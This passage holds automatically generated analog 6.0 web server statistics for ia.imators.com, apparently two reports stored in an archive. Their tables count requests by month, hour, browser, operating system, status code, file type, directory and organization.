class="R">11</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">10</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N">11</td><td class="R">3</td><td class="P">1</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N"> </td><td class="R">20</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">202</td><td class="P">150</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">257</td><td class="P">148</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">205</td><td class="P">130</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">45</td><td class="P">16</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">115</td><td class="P">73</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">115</td><td class="P">73</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">109</td><td class="P">72</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">737</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">87</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">464</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">9</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">34</td><td class="b"> 0.38%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">410</td><td class="b">30.94%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">284</td><td class="b">68.67%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">496</td><td class="b">55.95%</td><td class="xl">[directories]</td></tr> <tr><td class="R">159</td><td class="b">36.87%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">26</td><td class="b"> 4.60%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">21</td><td class="b"> 1.13%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 1.07%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">34</td><td class="b"> 0.38%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">496</td><td class="b">55.95%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">206</td><td class="b">42.60%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">1</td><td class="b"> 1.07%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">34</td><td class="b"> 0.38%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">496</td><td class="b">55.95%</td><td class="D">Jan/28/25 5:12 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 4.33%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 3.44%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">22</td><td class="b"> 2.04%</td><td class="D">Jan/26/25 4:00 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">21</td><td class="b"> 2.36%</td><td class="D">Jan/26/25 2:00 AM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 1.59%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">84</td><td class="b">33.14%</td><td class="D">Jan/26/25 4:00 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">75</td><td class="b"> 3.73%</td><td class="D">Jan/26/25 4:00 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">26</td><td class="b"> 4.60%</td><td class="D">Jan/16/25 5:04 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">21</td><td class="b"> 1.13%</td><td class="D">Oct/ 5/24 10:12 PM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">35</td><td class="b"> 1.46%</td><td class="D">Jan/14/25 10:05 PM</td><td class="xl">[not listed: 16 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> 4.html 0000644 00000142507 15114762025 0005611 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Tue, Apr 29 2025 at 2:21 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Tue, Apr 29 2025 at 8:22 AM (348.41 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Apr 29 2025 at 2:21 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 854 (13) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 588 (7) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 755 (3) <br /><span class="gensumtitle">Redirected requests:</span> 2 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 41 (206) <br /><span class="gensumtitle">Distinct hosts served:</span> 451 (538) <br /><span class="gensumtitle">Data transferred:</span> 772.29 kilobytes (12.26 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.22 kilobytes (1.75 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">65</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">31</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: May 2024 (101 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">124</td><td class="P">99</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">107</td><td class="P">73</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">115</td><td class="P">85</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">103</td><td class="P">66</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">152</td><td class="P">83</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">119</td><td class="P">99</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">134</td><td class="P">83</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">24</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 1</td><td class="R">29</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">41</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">17</td><td class="P">15</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">27</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">31</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">35</td><td class="P">27</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">36</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">52</td><td class="P">40</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">34</td><td class="P">28</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">35</td><td class="P">34</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">18</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">29</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">13</td><td class="R">34</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">20</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">19</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">16</td><td class="R">27</td><td class="P">15</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">29</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">19</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">21</td><td class="R">17</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">22</td><td class="R">215</td><td class="P">93</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">39</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">854</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">59</td><td class="b"> 7.80%</td><td class="xl">205.169</td></tr> <tr><td class="R">49</td><td class="b"> 4.92%</td><td class="xl">104</td></tr> <tr><td class="R">46</td><td class="b"> 7.10%</td><td class="xl">198.235</td></tr> <tr><td class="R">43</td><td class="b"> 5.24%</td><td class="xl">34</td></tr> <tr><td class="R">42</td><td class="b"> 5.30%</td><td class="xl">35</td></tr> <tr><td class="R">39</td><td class="b"> 6.87%</td><td class="xl">205.210</td></tr> <tr><td class="R">35</td><td class="b"> 3.56%</td><td class="xl">47</td></tr> <tr><td class="R">27</td><td class="b"> 3.92%</td><td class="xl">45</td></tr> <tr><td class="R">24</td><td class="b"> 3.26%</td><td class="xl">3</td></tr> <tr><td class="R">21</td><td class="b"> 9.41%</td><td class="xl">106</td></tr> <tr><td class="R">18</td><td class="b"> 2.16%</td><td class="xl">54</td></tr> <tr><td class="R">16</td><td class="b"> 1.14%</td><td class="xl">167.94</td></tr> <tr><td class="R">14</td><td class="b"> 0.54%</td><td class="xl">195.211</td></tr> <tr><td class="R">13</td><td class="b"> 0.97%</td><td class="xl">207.241</td></tr> <tr><td class="R">12</td><td class="b"> 1.19%</td><td class="xl">51</td></tr> <tr><td class="R">12</td><td class="b"> 0.10%</td><td class="xl">194.87</td></tr> <tr><td class="R">12</td><td class="b"> 0.90%</td><td class="xl">87</td></tr> <tr><td class="R">12</td><td class="b"> 0.90%</td><td class="xl">64.227</td></tr> <tr><td class="R">11</td><td class="b"> 1.34%</td><td class="xl">65.154</td></tr> <tr><td class="R">10</td><td class="b"> 1.16%</td><td class="xl">168.151</td></tr> <tr><td class="R">339</td><td class="b">32.24%</td><td class="xl">[not listed: 97 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer 